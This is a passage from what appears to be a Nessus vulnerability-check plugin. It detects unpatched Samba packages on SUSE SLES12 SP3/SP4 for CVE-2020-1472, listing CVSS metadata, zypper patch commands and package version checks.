:\n\nzypper in -t patch SUSE-SLE-HA-12-SP3-2020-2721=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-2721=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-2721=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-debugsource-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", 